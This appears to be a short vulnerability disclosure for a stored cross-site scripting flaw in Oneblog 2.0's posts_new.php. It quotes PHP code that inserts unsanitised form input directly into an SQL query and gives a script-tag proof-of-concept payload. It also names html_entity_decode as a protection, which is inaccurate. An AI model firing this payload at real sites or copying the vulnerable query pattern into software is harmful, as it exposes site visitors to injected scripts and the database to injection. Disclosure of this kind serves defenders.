Home / exploits Oneblog 2.0 Cross Site Scripting
Posted on 30 November -0001
<HTML><HEAD><TITLE>Oneblog 2.0 Cross Site Scripting</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Exploit Title :----------------- : Oneblog v2.0 - (posts_new.php) - Stored XSS # Author :------------------------ : Nassim Asrir # Author Company :------------------------ : HenceForth # Author Email :------------------------ : wassline@gmail.com # Google Dork :---------------- : - # Date :-------------------------- : 14/10/2016 # Type :-------------------------- : webapps # Platform : -------------------- : PHP # Software link : -------------- : http://wmscripti.com/php-scriptler/oneblog-blog-scripti.html ############################ Stored XSS Vulnerabilty ############################ ## Code ## }else{ $message = $_POST['message']; } if($title && $name && $message) { $query = "INSERT INTO blog (title, author, post, date) VALUES ('$title', '$name', '$message', NOW())"; $result = mysql_query($query); ## Proc ## - As you see the parameter ($message) is not protected using (html_entity_decode OR strip_tags). - To test it . go to Admin panel . "http://yoursite/admin/posts_new.php" and create in the Message box: "><script>alert(1);</script>. - and go to home page and you can see the alert and when any visitor visit your site he see the alert. ## Thnks To ## - All Muslim Hackerz </BODY></HTML>